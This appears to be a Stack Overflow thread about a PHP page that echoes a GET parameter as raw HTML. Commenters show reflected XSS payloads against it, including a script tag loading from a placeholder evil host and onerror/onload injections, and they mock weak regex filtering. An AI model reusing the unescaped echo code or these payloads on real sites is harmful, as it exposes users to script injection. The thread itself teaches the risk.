# How to send html data as a parameter in get request?

Tags: php

I have a dynamically generated table on my site and I'd like to output a link I can share with others that will load a page with the dynamically generated table.  To do this I've created a php file, `display_html.php`:

```
<?php

$html = $_GET['html'];
echo $html;

?>
```

And in my main site I make a get request to this file with this syntax:

```
$( "#tableLink" ).val( encodeURI( "http://my-domain-name.com/display_html.php?html=" + $( "#divContainingTable" ).html() ) );
```

However, this doesn't work and instead takes me to some advertisement site (I assume due to a location/parsing error).

Do I need to do some special kind of encoding because it's raw html?  Is there a better solution for this case?

EDIT: Output of $( "#divContainingTable" ).html() is: `<html><body><table><tbody><th class="output_table_header" colspan="3">Matchup #1 (77%)</th><tr><th class="output_column_header">Team 1</th><td class="vs_separator" rowspan="3">VS</td><th class="output_column_header">Team 2</th></tr><tr><td>RevanClipper</td><td>[XceL]Fugs_Bunny</td></tr><tr><td>[IhyD]S_A_B</td></tr></tbody></table><table><tbody><th class="output_table_header" colspan="3">Matchup #2 (74%)</th><tr><th class="output_column_header">Team 1</th><td class="vs_separator" rowspan="3">VS</td><th class="output_column_header">Team 2</th></tr><tr><td>[XceL]Fugs_Bunny</td><td>RevanClipper</td></tr><tr><td>[IhyD]S_A_B</td></tr></tbody></table><table><tbody><th class="output_table_header" colspan="3">Matchup #3 (74%)</th><tr><th class="output_column_header">Team 1</th><td class="vs_separator" rowspan="3">VS</td><th class="output_column_header">Team 2</th></tr><tr><td>[XceL]Fugs_Bunny</td><td>[IhyD]S_A_B</td></tr><tr><td>RevanClipper</td></tr></tbody></table></body></html>`

Comment: `http://my-domain-name.com/display_html.php?html=<script src="http://evilwebsite.com/allyoursitearebelongtous.js"></script>`...

Comment: What is output of $( "#divContainingTable" ).html() ?

Comment: This is such a bad idea. Please understand what the first comment is showing you.

Comment: @Tigger I get it now, but then what's the responsible solution?

Comment: Why you don't use Post request to send HTML?

Comment: I wouldn't be able to make a sharable link with that if I remember correctly.

Comment: You can insert HTML into database and create shorten link for it.

Comment: @Niet the Dark Absol: I could just do a regex replace of all `<script>` tags with `""`.  Problem solved.

Comment: @JpajiRajnish OK. `http://my-domain-name.com/display_html.php?html=<img src="nonexistant.png" onerror="loadEvilScript();" />`

Comment: @Niet the Dark Absol: Easy.  I'll just do a recursive regex that replaces all `<script>` tags and all function calls with `""`.  Solved.

Comment: How do you define "all function calls"?

Comment: "all function calls" = `/\w+\(\);?/`

Comment: @Niet the Dark Absol: I win.

Comment: `http://my-domain-name.com/display_html.php?html=<img src="nonexistant.png" onerror="document.write('<scr'+'ipt src=\'gotcha.js\'></scr'+'ipt>');" />` You will never win this.

Comment: Add replace all `onerror` attributes to my last post.  Next!

Comment: `http://my-domain-name.com/display_html.php?html=<img src="iDOexist.png" onload="..." />`

Comment: Child's play.  I'll just remove all attributes that aren't in a predefined list in the `display_html.php` file.  And I'll be sure `onload` isn't in it.

Comment: Let us [continue this discussion in chat](http://chat.stackoverflow.com/rooms/110717/discussion-between-niet-the-dark-absol-and-jpaji-rajnish).